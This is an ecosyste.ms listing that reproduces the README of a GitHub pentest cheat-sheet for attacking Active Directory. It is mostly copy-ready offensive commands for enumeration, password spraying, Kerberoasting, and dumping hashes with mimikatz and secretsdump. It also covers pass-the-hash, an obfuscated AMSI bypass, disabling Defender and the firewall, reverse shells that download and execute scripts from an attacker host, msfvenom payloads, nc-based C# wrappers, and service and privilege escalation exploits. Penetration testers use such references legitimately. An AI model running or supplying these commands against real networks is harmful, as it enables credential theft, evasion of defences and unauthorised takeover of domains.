Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/rodolfomarianocy/tricks-pentest-active-directory

Repository with quick triggers to help during Pentest in an Active Directory environment.
https://github.com/rodolfomarianocy/tricks-pentest-active-directory

active-directory attack exploitation hacking pentest pentest-active-directory pentesting tips tricks vulnerability

Last synced: 4 days ago
JSON representation

Repository with quick triggers to help during Pentest in an Active Directory environment.

Host: GitHub
URL: https://github.com/rodolfomarianocy/tricks-pentest-active-directory
Owner: rodolfomarianocy
Created: 2022-08-23T16:00:22.000Z (over 2 years ago)
Default Branch: main
Last Pushed: 2024-10-27T22:16:36.000Z (4 months ago)
Last Synced: 2024-12-14T09:16:31.349Z (about 2 months ago)
Topics: active-directory, attack, exploitation, hacking, pentest, pentest-active-directory, pentesting, tips, tricks, vulnerability
Homepage:
Size: 744 KB
Stars: 38
Watchers: 2
Forks: 14
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

Tricks - Pentest Active Directory

[x] In construction...

## Topics
- [Windows Server AD e Azure AD](#windows-server-ad-e-azure-ad)
- [Domain Authentication](#domain-authentication)
- [Domain Services](#domain-services)
- [Recon Passive](#recon-passive)
- [Recon Active](#recon-active)
- [Capturing Information](#capturing-information)
- [AD Enumeration](#ad-enumeration)
- [Basic Active Directory Attacks](#basic-active-directory-attacks)
- [Port Forwarding and Proxying](#port-forwarding-and-proxying)
- [Bypass and Disable](#bypass-and-disable)
- [Local Privilege Escalation](#local-privilege-escalation)
- [Escalating privileges across domains](#escalating-privileges-across-domains)
- [Across Forest using Trust Tickers](#across-forest-using-trust-tickets)
- [Persistence](#persistence)
- [Attacks Detection via Events](#attacks-detection-via-events)
- [Mitigation and Defense Mechanisms](#mitigation-and-defense-mechanisms)
- [Pentest Azure AD](#pentest-azure-ad)

---

## Windows Server AD e Azure AD
### Windows Server AD

-> LDAP
-> NTLM
-> Kerberos
-> OU Tree
-> Domains and Forests
-> Trusts

### Azure AD
-> Rest API's
-> OAuth/SAML
-> OpenID
-> Flat Structure
-> Tenant
-> Guests

---
## Domain Authentication
### Kerberos - Ticket Based

Reference:
- https://www.manageengine.com/products/active-directory-audit/kb/windows-security-log-event-id-4769.html

### NTLM (NT LAN Manager) - Challenge/Response Based

Reference:
- https://www.action1.com/zerologon-windows-vulnerability-what-is-it-and-how-to-tackle-it/

## Domain Services
LDAP - Lightweight Directory Access Protocol
Certificate Services
Domain Name Services(DNS, LLMNR, NBT-NS)

## Recon Passive
[X] In Construction
Search for information such as: user ID's, enrollment, logins, emails, credentials in:
-> Social Media (Linkedin, Instagram, Twitter, etc...);
-> Look for leaks in search engines with shodan and services with pastebin;
-> Code Repositories (github, gitlab, bitbucket, etc...) Using google dorking or web services like grep.app:
https://grep.app/
-> Discovery emails how Hunter.io, snov.io, mindlead.io and emailfinder for example:
https://hunter.io/
https://snov.io/email-finder
https://minelead.io/search/
https://github.com/Josue87/EmailFinder

## Recon Active
### Host Discovery
-> nmap static binary
```
nmap -sn 10.10.0.0/16
```
https://github.com/andrew-d/static-binaries/tree/master/binaries
-> crackmapexec
```
crackmapexec smb 192.168.0.20/24
```

-> Ping Sweep - PowerShell
```
for ($i=1;$i -lt 255;$i++) { ping -n 1 192.168.0.$i| findstr "TTL"}
```

-> Ping Sweep - Bash
```
for i in {1..255};do (ping -c 1 192.168.0.$i | grep "bytes from" &); done
```

-> Port Scanning - Bash
```
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done
```
-> Port Scanning - NetCat
```
nc -zvn 1-1000
```
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat

### Capturing Information
-> nmap
```
nmap -sC -sV -A -Pn -T5 -p-
```

-> rustscan
```
rustscan -a -- -A -Pn
```

-> enum4linux
```
enum4linux
```
```
enum4linux -a -u "" -p "" && enum4linux -a -u "guest" -p ""
```

### Enumerating Users via Kerberos
-> kerbrute
```
kerbrute userenum -d --dc userlist.txt
```
-> nmap
```
sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=test.local,userlist.txt
```
-> Wordlists
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

-> lookupsid.py via RPC
```
impacket-lookupsid anonymous@
```
https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/lookupsid.py

### Changing expired password via smbpasswd
-> Identify
```
crackmapexec smb $IP -u users.txt -p pass.txt
\\ STATUS_PASSWORD_MUST_CHANGE
```
-> Changing expired password
```
smbpasswd -r -U
```

### Validate Credentials/Permissions
-> Validation of network user credentials via smb using crackmmapexec
```
crackmapexec smb 192.168.0.10-20 -u administrator -H -d --continue-on-success
crackmapexec smb 192.168.0.10-20 -u administrator -H -d
crackmapexec smb 192.168.0.10-20 -u administrator -H --local-auth --lsa
crackmapexec smb 192.168.0.10-20 -u administrator -p
```

-> List SMB shared folders authentically
```
smbclient -L // -I -U
```

-> Access a shared folder via SMB
```
smbclient ///folder -I -U
```

-> smbmap
```
smbmap -H -u
```

-> See read permission of given user on smb shares
```
crackmapexec smb --shares -u -p ''
```

### Remote Access
#### Remote Desktop Protocol - RDP

-> Create a user
```
net user /add
```

-> Add to local administrators group
```
net localgroup Administrators /add
```

-> Add to group of users who can access via RDP
```
net localgroup "Remote Management Users" /add
net localgroup "Remote Desktop Users" /add
```

-> Enable RDP
```
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```

-> move to another user
```
runas /user:\ cmd
```

-> xfreerdp via RDP with sharing in \\\tsclient\share\
```
xfreerdp /u:user /p:pass /v:ip +clipboard /dynamic-resolution /cert:ignore /drive:/usr/share/windows-resources,share
```
-> rdesktop via RDP
```
rdesktop -u -p -d -f
```
-> evil-winrm
```
evil-winrm -i -u -p
```

## AD Enumeration
#### net commands of Command Prompt
-> List domain users
```
net user /domain
```

-> List domain groups
```
net group /domain
```

-> View memberships for a particular group
```
net localgroup
```

-> Enumerate domain password policy
```
net accounts /domain
```

-> View interfaces and network information
```
ipconfig /all
```

-> View all active TCP connections and the TCP and UDP ports the host is listening on
```
netstat -ant
```

-> List running processes
```
tasklist
```

-> View system tasks
```
schtasks
```

#### cmdlets of Powershell
-> Configure ActiveDirectory Module - RSAT
```
curl https://raw.githubusercontent.com/samratashok/ADModule/master/ActiveDirectory/ActiveDirectory.psd1 -o ActiveDirectory.psd1
curl https://github.com/samratashok/ADModule/blob/master/Microsoft.ActiveDirectory.Management.dll?raw=true -o Microsoft.ActiveDirectory.Management.dll
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory.psd1
```

-> Configure PowerView Module
```
curl https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 -o PowerView.ps1
. .\PowerView.ps1
```

-> List all AD users - properties/description
```
Get-ADUser -Filter * (AD Module)
Get-NetUser (PowerView)
Get-NetUser -Username user (PowerView)
Get-UserProperty (PowerView)
Get-UserProperty -Filter pwdlastset (PowerView)
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
Find-UserField -SearchField Description -SearchTerm "built"
```

-> Get all information from a specific user, format it in a table and seeing only the Name attribute
```
Get-ADUser -Identity -Server -Properties * | Format-Table Name,SamAccountName -A
```

-> Logged On Users
```
Get-NetLoggedon -ComputerName
```

-> Get locally logged users
```
Get-LoggedonLocal -ComputerName
```

-> Last logon
```
Get-LastLoggedOn -ComputerName
```

-> List Computers
```
Get-NetComputer (PowerView)
Get-NetComputer -OperatingSystem "**" (PowerView)
Get-NetComputer -Ping (PowerView)
Get-NetComputer -FullData (PowerView)
Get-ADComputer -Filter * -Properties * (AD Module)
Get-ADComputer -Filter * | select Name (AD Module)
Get-ADComputer -Filter * | findstr (AD Module)
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem (AD Module)
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName} (AD Module)
```

-> Add domain user to a domain group
```
Add-DomainGroupMember -Identity 'SQLManagers' -Members 'examed'
Get-NetGroupMember -GroupName 'SQLManagers'
```

-> Get machines from user from spefific group
```
Find-GPOLocation -UserName -Verbose (PowerView)
```
-> Find Shares,file servers and sensitive files
```
Get-SmbShare (AD Module)
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC –Verbose (PowerView)
Invoke-FileFinder -Verbose (PowerView)
Get-NetFileServer (PowerView)
```
-> List GPO
```
Get-NetGPO (PowerView)
Get-NetGPO -ComputerName .domain> (PowerView)
Get-GPO -All (PowerView)
```

-> Get OUs and GPO aplliend on an OU
```
Get-ADOrganizationalUnit -Filter * (AD Module)
Get-NetOU -FullData (PowerView)
Get-NetOU | %{Get-NetComputer -ADSPath $_} (PowerView)
Get-NetGPO -GPOname (PowerView)
```

-> Get ACLs from user
```
Get-ObjectAcl -SamAccountName -ResolveGUIDs (PowerView)
```

-> Get ACL associated with prefix,path and LDAP
```
Get-ObjectAcl -ADSprefix '' -Verbose (PowerView)
Get-ObjectAcl -ADSpath "" -ResolveGUIDs -Verbose (PowerView)
(Get-ACL 'AD:\CN=Administrator, CN=Users, DC=example, DC=okay, DC=local').Access
Get-PathAcl -Path "" (PowerView)
```

-> Search ACEs
```
Invoke-ACLScanner -ResolveGUIDs (PowerView)
```

-> Get groups current domain
```
Get-NetGroup (PowerView)
Get-NetGroup -Domain (PowerView)
Get-NetGroup -FullData (PowerView)
Get-ADGroup -Filter * | select Name (AD Module)
Get-ADGroup -Filter * -Properties * (AD Module)
```

-> List local gorups on machine
```
Get-NetLocalGroup -ComputerName -ListGroups (PowerView)
```

-> Get members of local group
```
Get-NetLocalGroup -ComputerName -Recurse (PowerView)
```

-> Get member from group
```
Get-NetGroupMember -GroupName '' (PowerView)
Get-NetGroupMember -GroupName '' -Domain (PowerView)
Get-NetGroupMember -GroupName "Domain Admins" -Recurse (PowerView)
Get-NetGroup -UserName (PowerView)
Get-ADGroupMember -Identity "Domain Admins" -Recursive (AD Module)
Get-ADGroupMember -Identity "Enterprise Administrators" -Recursive (AD Module)
Get-ADPrincipalGroupMembership -Identity (AD Module)
```

-> Enumerate AD Admins Group Membership
```
Get-ADGroup -Identity Administrators -Server -Properties * (AD Module)
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name (AD Module)
```

-> Provides domain-specific information
```
Get-ADDomain -Server (AD Module)
Get-NetDomain -Domain domain.local (PowerView)
```

-> Get objects in Domain
```
Get-ADDomain -Identity domain.local (AD Module)
```

-> Get GRP from Restricted Groups or groups.xml
```
Get-NetGPOGroup (PowerView)
```

-> Domain Trust
```
Get-NetForestDomain (PowerView)
Get-ADForest (AD Module)
(Get-ADForest).Domains (AD Module)
Get-NetDomainTrust -Domain (PowerView)
Get-ADForest | %{Get-ADTrust -Filter *}
Get-NetForestDomain -Verbose | Get-NetDomainTrust (PowerView)
Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} (PowerView)
(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_} (AD Module)
Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} (PowerView)
Get-ADTrust -Filter * -Server
```

-> Get SID for current domain
```
Get-DomainSID (PowerView)
(Get-ADDomain).DomainSID (ADModule)
```

-> To perform an assertive password spraying attack, you can enumerate accounts that have badPwdCount greater than 0 and avoid them during the attack.
```
Get-ADObject -Filter 'badPwdCount -gt 0' -Server za.tryhackme.com (ADModule)
```

-> Search for AD object that was changed on a specific date
```
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com
```

-> Get info from Domain Policies
```
Get-DomainPolicy (PowerView)
```

-> Get domain controllers from current domain
```
Get-NetDomainController (PowerView)
Get-ADDomainController (AD Module)
```

-> User Hunting - finds machines on the domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
```
iex (iwr http:///PowerView.ps1 -UseBasicParsing)
Invoke-UserHunter
Invoke-UserHunter -Stealth
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -GroupName "" (PowerView)
Get-NetSession -ComputerName (validate access) (PowerView)
```

-> Local Admin Access from all machines and PSSession stateless and stateful
```
iex (iwr http:///PowerView.ps1 -UseBasicParsing)
iex (iwr http:///Find-PSRemotingLocalAdminAccess.ps1 -UseBasicParsing)
iex (iwr http:///Find-WMILocalAdminAccess.ps1 -UseBasicParsing)
Invoke-CheckLocalAdminAccess
Find-LocalAdminAccess
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
. .\Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
```
```
Invoke-Command -ScriptBlock {whoami} -ComputerName
Enter-PSSession -ComputerName
```
or
```
$sess = New-PSSession -ComputerName
Enter-PSSession $sess
```
or
-> PsExec64.exe
```
PsExec64.exe \\. -u \user -p cmd
```

### Capturing configuration file credentials
-> Powershell History
```
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

-> EXploiting Saved Windows Credentials
```
cmdkey /list
runas /savecred /user:admin cmd.exe
```

-> IIS Configuration
```
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
type C:\inetpub\wwwroot\web.config | findstr connectionString
```

-> Retrieve Credentials from Software: PuTTY
```
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
```

-> Unattended Windows Installations
```
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

-> Identify
```
dir /s *.db
```

-> McAfee Enterprise Endpoint Security - Credentials used during installation
```
C:\ProgramData\McAfee\Agent\DB\ma.db
sqlitebrowser ma.db
python2 mcafee_sitelist_pwd_decrypt.py
```
https://raw.githubusercontent.com/funoverip/mcafee-sitelist-pwd-decryption/master/mcafee_sitelist_pwd_decrypt.py

### Automated AD Enumeration and Dumping
#### BoodHound
password default = neo4j:neo4j
-> Install and start neo4j - http://localhost:7474/
```
neo4j.bat windows-service install
neo4j.bat start
```
https://neo4j.com/download-center/

-> BloodHound.exe
https://github.com/BloodHoundAD/BloodHound/

-> Install linux
```
sudo apt install bloodhound
```
-> neo4j start - http://localhost:7474/
```
sudo neo4j start
```

-> Enumeration - Windows
```
iwr -uri /SharpHound.ps1 -Outfile SharpHound.ps1
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All,loggedon
Invoke-BloodHound -CollectionMethod All -Verbose
Invoke-BloodHound -CollectionMethod LoggedOn -Verbose
```

-> bloodhound-python - Dumping and viewing AD tree

```
sudo bloodhound-python -u -p -ns -d test.local -c all
```
https://github.com/fox-it/BloodHound.py

-> enum4linux - enumeration
```
enum4linux -v -u -p -a
```
-> ldapdomaindump - Dump AD
https://github.com/dirkjanm/ldapdomaindump

## Basic Active Directory Attacks
### Password Spraying
-> kerbrute
```
kerbrute passwordspray -d test.local --dc users.txt pass@2022
```
-> crackmapexec
```
crackmapexec smb -u users.txt -p pass@2022 --no-bruteforce
```

### AS-REP Roasting Attack - not require Pre-Authentication
-> kerbrute - Enumeration Users
```
kerbrute userenum -d test.local --dc userlist.txt
```
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt

-> GetNPUsers.py - Query ASReproastable accounts from the KDC
```
python GetNPUsers.py domain.local/ -dc-ip -usersfile userlist.txt
```
https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetNPUsers.py

### Kerberoasting
-> GetUserSPNs
```
impacket-GetUserSPNs '/:' -dc-ip -request
```
https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py

### LDAP Pass-back
-> Creating a rogue LDAP server
```
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
```
```
sudo dpkg-reconfigure -p low slapd
```

-> Creating file for ensuring that the LDAP server only supports PLAIN and LOGIN authentication methods
```
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```
```
sudo tcpdump -SX -i breachad tcp port 389
```

### NetNTLM Authentication Exploits with SMB
Responder allows you to perform Man-in-the-Middle attacks by poisoning responses during NetNTLM authentication, making the client talk to you instead of the real server it wants to connect to.

#### LLMNR Poisoning - Capturing hash in responder
On a real lan network, the responder will attempt to poison all Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Server (NBT-NS), and Web Proxy Auto-Dscovery (WPAD) requests detected. NBT-NS is the precursor protocol to LLMNR.

```
responder -I eth0 -v
```

---

### Exploring Microsoft Deployment Toolkit - MDT
-> Identify MDT
-> Extract PXE Boot Image
```
tftp -i GET "\Tmp\x86x64{...}.bcd" conf.bcd
```

-> Retrieve the locations of PXE boot images from BCD file
```
powershell -executionpolicy bypass
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
tftp -i GET "" pxeboot.wim
```

-> Retrieve credentials from a PXE Boot Image
```
Get-FindCredentials -WimFile pxeboot.wim
```
https://github.com/wavestone-cdt/powerpxe

### Extracting hashes
#### Intro
-> SAM - Security Account Manager (Store as user accounts) %SystemRoot%/system32/config/sam
-> NTDS.DIT (Windows Server / Active Directory - Store AD data including user accounts) %SystemRoot%/ntds/ntds.dit
-> SYSTEM (System file to decrypt SAM/NTDS.DIT) %SystemRoot%/system32/config/system
-> Backup - Sistemas antigos como XP/2003: C:\Windows\repair\sam and C:\Windows\repair\system

#### Get sam and system by registry (From old versions to recent versions)
```
reg save hklm\sam sam
reg save hklm\system system
```

-> transfer sam and syste via sharing files via SMB
-> Configuring smb server 1
```
impacket-smbserver share . -smb2support -user user -password teste321
```
-> Configuring smb server 2
```
net use \\\share /USER:user teste321
copy C:\Users\Backup\sam.hive \\\share\
copy C:\Users\Backup\system.hive \\\share\
```
https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/smbserver.py

-> View smb enumeration

```
net view \\dc /all
net use * \\dc\c$
net use
```

-> use impacket-secretsdump
```
impacket-secretsdump -sam sam -system system LOCAL
```

#### Get ntds.dit and system by registry - Active Directory

-> vssadmin - Volume shadow copy (Windows Server \ recent versions)
```
vssadmin create shadow /for=c:
```

-> copy ntds.dit and system
```
copy \Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
copy \Windows\System32\config\SYSTEM C:\Windows\Temp\system.save
```

-> delete volume shadow copy
```
vssadmin delete shadows /shadow=
```

-> use impacket-secretsdump
```
impacket-secretsdump -ntds ntds.dit.save -system system.save LOCAL
```

#### Others
-> meterpreter
```
hashdump
```

-> samdump2 (Win 2k/NT/XP/Vista SAM)
```
samdump2 system sam
```

#### Extracting Hashes in Domain and Pivoting
-> Dump the credentials of all connected users, including cached hashes
```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
```
-> mimikatz + ScriptBlock
```
$sess = New-PSSession -ComputerName
```
```
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
iex (iwr http:///Invoke-Mimikatz.ps1 -UseBasicParsing)
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
```
or
```
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
Invoke-Mimikatz
```

#### Extracting Hashes in cache
-> fgdump
```
fgdump.exe
```
/usr/share/windows-binaries/fgdump/fgdump.exe

-> meterpreter
```
load kiwi
creds_msv
```

-> wce-universal (Clear Text password)
```
wce-universal.exe -w
```
/usr/share/windows-resources/wce/wce-universal.exe

-> mimikatz
```
.\mimikatz.exe
sekurlsa::wdigest -a full
sekurlsa::logonpasswords
```

-> mimikatz - meterpreter
```
load mimikatz
wdigest
```

#### Extracting Hashes (Remote)
```
impacket-secretsdump user:password@IP
```

### Pass-The-Hash and Over-Pass-The-Hash
-> mimikatz (perform the pass the hash technique for the machine account to elevate access to domain admin)
```
iex (iwr http:///Invoke-Mimikatz.ps1 -UseBasicParsing)
Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe"'
```

-> Evil-WinRM
```
evil-winrm -i -u -H
```

-> pth.exe
```
pth-winexe -U user%hash //ip cmd.exe
```

-> psexec (msfconsole)
```
use /exploit/windows/smb/psexec
```

## Bypass and Disable
### AppLocker Bypass
Analyse
```
$ExecutionContext.SessionState.LanguageMode
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

### AMSI
(AntiMalwareScan Interface) gives registered antivirus access to the contents of a script prior to execution, dependent on signature-based detection by the active antivirus.
-> Detection of malicious scripts in:
Memory;
Disk;
Ofuscated;
Enabled by default in Windows 10 and supported by Windows Defender.
-> AMSI Bypass
```
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```
https://amsi.fail/
-> Disable AMSI
```
Set-MpPreference -DisableScriptScanning 1
```

### Disable Firewall
```
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off
```

### Disable Windows Defender
```
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true
```

### PowerShell Bypass
-> Types of Bypass:
Downgrade to version 2;
Unloading, disabling or unsubscribing;
Obfuscation;
Trust abuse (Using trusted executables and code injection in trusted scripts);

#### Downgrade to version 2;
PowerShell version 2 lacks many security mechanisms.
```
get-host
powershell.exe -Version 2
get-host
```

### Microsoft ATA (Advanced Threat Analytics)
https://learn.microsoft.com/pt-br/advanced-threat-analytics/what-is-ata

#### Evading ATA - Overpass-the-hash - Bypass
-> normal AS-REQ packet looks like:
\\ etype: eTYPE AES256-CTS-HMAC-SHA1-96
-> AS-REQ packet overpass-the-hash:
```
Payload: Invoke-Mimikatz '"sekurlsa::pth /userprivservice /domain:offensiveps.com /ntlm:ntlmhash"'
```
\\ etype: eTYPE-ARCFOUR-HMAC-MD5

For bypass:
```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:privservice /domain:offensiveps.com /aes256:aes256 /ntlm:ntlm /aes128:aes128'"
```
AES256+AES128+NTLM(RC4) together reduces chances of detection.
"AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with KB2871997, in this case you can avoid NTLM hash."
https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf

#### Evading ATA - Golden Ticket - Bypass
```
Invoke-Mimikatz -Command '"kerberos::golden /User:privservice /domain:offensiveps.com /sid:sid /aes256:aes256keysofkrbrtgt /id:500 /groups:513 /ptt"'
```

### Reverse Shell and Access
-> Invoke-PowerShellTcp + powercat
```
. .\powercat.ps1
powercat -l -v -p 443 -t 1000
powershell.exe iex (iwr http:///Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress -Port 443
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress -Port 443
```
https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

-> Bypass
"Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team."
https://github.com/t3l3machus/Villain
Hoaxshell
"hoaxshell is a Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell."
https://github.com/t3l3machus/hoaxshell

## Port Forwarding and Proxying
### Port Forwarding
#### SSH Tunneling/Local Port Forwarding
```
ssh user@ -p port -L 8001:127.0.0.1:8080 -fN
```

#### SSH Remote Port Forwarding
```
ssh -R 5555:127.0.0.1:5555 -p2222 @
```

#### Socat - Port Forward
```
./socat.exe TCP-LISTEN:8002,fork,reuseaddr TCP:127.0.0.1:8080
```

#### chisel - Remote Port Forward
-> Your machine
```
./chisel server -p --reverse &
```

-> Compromised Host
```
./chisel client : R::: &
```

#### Chisel - Local Port Forward
-> Compromised Host
```
./chisel server -p
```

-> Your Machine
```
./chisel client : ::
```

#### pklink - Remote Port Forward
```
cmd.exe /c echo y | plink.exe -ssh -l -pw -R 192.168.0.20:1234:127.0.0.1:3306 192.168.0.20
```

### Proxying - Network Pivoting
#### sshuttle (Unix) - proxying
```
sshuttle -r user@ --ssh-cmd "ssh -i private_key" 172.16.0.0/24
```

#### SSH + Proxychains
edit /etc/proxychains.conf with socks4 127.0.0.1 8080
```
ssh -N -D 127.0.0.1:8080 @ -p 2222
```

#### chisel - Reverse Proxy
-> Your Machine
```
./chisel server -p LISTEN_PORT --reverse &
```

-> Compromised Host
```
./chisel client : R:socks &
```

#### chisel - Forward Proxy
-> Compromised Host
```
./chisel server -p --socks5
```

-> Your Machine
```
./chisel client : :socks
```

#### metasploit - proxying
```
route add /24 1
route print
use auxiliary/server/socks_proxy
run
```

## Local Privilege Escalation
### binPath - Services
-> Detection
```
. .\PowerUp.ps1
Get-ModifiableService -Verbose
```
or
```
Get-ModifiableService -Verbose
wmic service get Name,State,PathName | findstr "Running" | findstr "Program"
wmic service get Name,State,PathName | findstr "Program"
icacls
//(F) and (i) (F)
accesschk.exe -wuvc
//RW Everyone
// SERVICE_CHANGE_CONFIG
sc qc
```

-> Exploitation - windows
```
certutil -urlcache -f http://10.9.1.137:803/ok.exe ok.exe
sc config binPath="C:\Users\files\ok.exe" obj= LocalSystem
sc stop
sc query
sc start
```

https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

### Unquoted Service Path - Services
-> Detection
```
wmic service get Name,State,PathName | findstr "Program"
sc qc
\\ BINARY_PATH_NAME display Unquoted Service Paths, without ""
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
```
or
```
. .\PowerUp.ps1
Get-ServiceUnquoted -Verbose (PowerUp)
```

-> Exploitation
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > name .exe
move .exe
sc stop
sc start
```
or
```
Invoke-ServiceAbuse -Name -UserName $(whoami)
```

### Unquoted Service Path - Services (STEALTH) - Evasion AV
-> Install
```
sudo apt install mono-devel
```
-> Wrapper.cs
```
using System;
using System.Diagnostics;

namespace Wrapper{
class Program{
static void Main(){
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", " -e cmd.exe");
procInfo.CreateNoWindow = true;
proc.StartInfo = procInfo;
proc.Start();
}
}
}
```
-> Compile C# Code
```
mcs Wrapper.cs
```
Now move to the target, and place it in the correct directory with the correct name to exploit the service.
```
sc stop
```
```
sc start
```

#### Modify configuration of services - Services
```
Get-ModifiableService -Verbose (PowerUp)
```

### SeBackup / SeRestore - Windows Privileges
-> Detection
```
whoami /priv
\\SeBackupPrivilege
\\SeRestorePrivilege
```

-> Exploitation
```
reg save hklm\system C:\Users\user\system.hive
reg save hklm\sam C:\Users\user\sam.hive
```

### SeTakeOwnership - Windows Privileges
-> Detection
```
whoami /priv
//SeTakeOwnership
```

-> Exploitation
```
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant :F
copy cmd.exe utilman.exe
```
### SeImpersonate / SeAssignPrimaryToken - Windows Privileges
-> Detection
```
whoami /priv
// SeAssignPrimaryTokenPrivilege
// SeImpersonatePrivilege
```

-> Exploitation
```
powershell.exe -c "wget http://ip/RogueWinRM.exe -O RogueWinRM.exe"
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\nc64.exe" -a "-e cmd.exe "
```
or
```
PrintSpoofer64.exe -i -c cmd
```
https://github.com/itm4n/PrintSpoofer

### Other Docs
https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants
https://github.com/gtworek/Priv2Admin

### Tasks
-> Detection
```
schtasks
schtasks /query /tn /fo list /v
icacls
\\ BUILTIN\Users:(I)(F)
```

-> Exploitation
```
echo "net localgroup administrators user /add" >
schtasks /run /tn
```

### Autorun
-> Detection
```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu ""C:\Program Files\Autorun Program"
\\FILE_ALL_ACCESS
```

-> Exploitation
```
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe -o program.exe
```
```
move program.exe "C:\Program Files\Autorun Program"
logoff
```

### AlwaysInstallElevated
-> Detection
```
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
\\ value is 1
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
\\ value is 1
```

